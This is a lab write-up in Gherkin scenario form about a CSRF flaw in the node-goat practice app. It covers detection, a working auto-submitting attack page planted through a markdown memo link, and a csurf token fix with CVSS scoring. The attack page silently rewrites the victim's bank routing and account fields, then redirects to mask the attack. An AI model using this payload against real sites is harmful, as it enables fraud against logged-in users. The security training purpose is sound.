## Version 1.4.1
## language: en

Feature:CSRF
  TOE:
    node-goat
  Category:
    Cross-Site Request Forgery (CSRF)
  Location:
    http://localhost:4000/memos
    http://localhost:4000/profile
  CWE:
    CWE-352: Cross-Site Request Forgery (CSRF)
      https://cwe.mitre.org/data/definitions/352.html
  Rule:
    REQ.305: https://fluidattacks.com/web/rules/305/
  Goal:
    Change the profile data of any user.
  Recommendation:
    Use tokens to validate the origin of a request.

  Background:
      Hacker's software:
      | <Software name> | <Version> |
      | Ubuntu          | 18.04.04  |
      | Firefox         | 73.0.1    |
  TOE information:
    Given I am accessing the site http://localhost:4000
    And the server is running MongoDB version 2.1.18
    And Nodejs version 10.15.3

  Scenario: Normal use case
    Given I access to "http://localhost:4000/"
    And login in with a new user
    When I can manage my account
    Then I can use the memos tab
    And I can read the memos from all users

  Scenario: Static detection
    Given The source code
    When I see the code in "/views/memos.html"
    """
    28|   {% for doc in memosList %}
    29|   <div class="panel panel-info">
    30|     <div class="panel-body">
    31|       {{ marked(doc.memo) }}
    32|     </div>
    33|   </div>
    34|   {% endfor %}
    """
    Then I see that the page use a markdown like "marked"
    And The page admit links and other things
    When I see the code in "/views/profile.html"
    Then I see that the form use a POST method
    """
    38|   <form role="form" method="post" action="/profile">
    """
    And I see that the form don't validate the origin from the data comes
    When I see that and think that a logged user can open a page without logout
    Then If the page are a malicious page an attacker can make a CSRF
    And If success the attacker can update any field of the profile tab
    And I think that an evil user can use the memos to redirect to his page
    And I think that this can be a vulnerability

  Scenario: Dynamic detection
    Given I am in the memos tab
    When I try to use markdown to inject HTML
    Then I use markdown to inject a redirect link
    """
    [Link](https://google.com)
    """
    And I submit the injection
    When I see the page a new link was charged in the page [evidence](image1)
    Then I click on it and redirects me to google [evidence](image2)
    And I try to found a way to use that
    When I go to profile tab i inspect the page to see the HTML content
    Then I see the names and id off all fields in the form
    And I try to replicate that in another page
    When I use a blank page and use inspector i can modify the HTML
    Then I paste the HTML of the form [evidence](image3)
    And I change the attribute action to the target page
    And I add another value to the name input
    When I click on submit, the page redirects to profile and update data
    And I found a vulnerability

  Scenario: Exploitation
    Given The application use markdown for a rich content in memos
    Given The memos admit links to others pages
    Given The memos tab load memos from all users
    Given Any person can register in the page
    Given Any person can publish a memo
    Given With a evil page you can update the profile tab
    Given The user to attack needs to be logged
    Given A logged user can read the memos
    When I think to change the bankRouting field of any user to get money
    Then I register in the page with fake data
    And I go to memos tab
    When I'm in memos tab I use markdown to inject a link [evidence](image4)
    And I see my distracting memo with an image and my evil link [evidence](image5)
    Then The link redirects to my malicious page
    """
     1|  <!doctype html>
     2|  <html lang="en" ng-app>
     3|  <head>
     4|    <title>News</title>
     5|  </head>
     6|  <body onload="document.getElementById('form').submit();">
     7|    <h1>Loading...</h1>
     8|    <form id="form" method="POST" action="http://localhost:4000/profile"
           target="iframeHidden">
     9|      <input type="hidden" name="bankRouting" value="88465#" />
    10|      <input type="hidden" name="bankAcc" value="95468#" />
    11|    </form>
    12|    <iframe name="iframeHidden"
           style="width:0; height:0; border:0; border:none" onload="send()">
           </iframe>
    13|    <script>
    14|      function send() {
    15|        setTimeout("location.replace('https://www.marketwatch.com/')", 20);
    16|      }
    17|    </script>
    18|  </body>
    19|  </html>
    """
    And The page load, submit data and redirect to news page [evidence](image6)
    When User didn't notice that was in a malicious page because was redirect
    Then The profile data was changed [evidence](image7)
    And I exploit the vulnerability

  Scenario: Remediation
    Given I try to use a token to validate the origin from data is coming
    Given The source code "/views/profile.html"
    Given The source code "/server.js"
    When I go to "/server.js" and see how to add a token validation
    Then I add some code to add a CSRF token
    """
      8|  var csrf = require('csurf')
    ....................................................................
    108|  // Enable Express csrf protection
    109|  app.use(csrf());
    110|  // Make csrf token available in templates
    111|  app.use(function(req, res, next) {
    112|    res.locals.csrftoken = req.csrfToken();
    113|    next();
    114|  });
    """
    And I need to add this token on the form in the profile tab
    When I go to "/views/profile.html" and see the form
    Then I add a hidden field to use the CSRF token
    """
    68|   <input type="hidden" name="_csrf" value="{{csrftoken}}" />
    """
    When I try to attack again with the link in memos
    Then The profile didn't update
    And I fix the vulnerability

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
  6.3/10 (Medium) - AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
  5.7/10 (Medium) - E:F/RL:W/RC:R/CR:H/IR:M
  Environmental: Unique and relevant attributes to a specific user environment
  6.0/10 (Medium) - MAV:N/MAC:L/MPR:L/MUI:R/MS:U/MC:L/MI:H/MA:N

  Scenario: Correlations
No correlations have been found to this date 2020-03-16
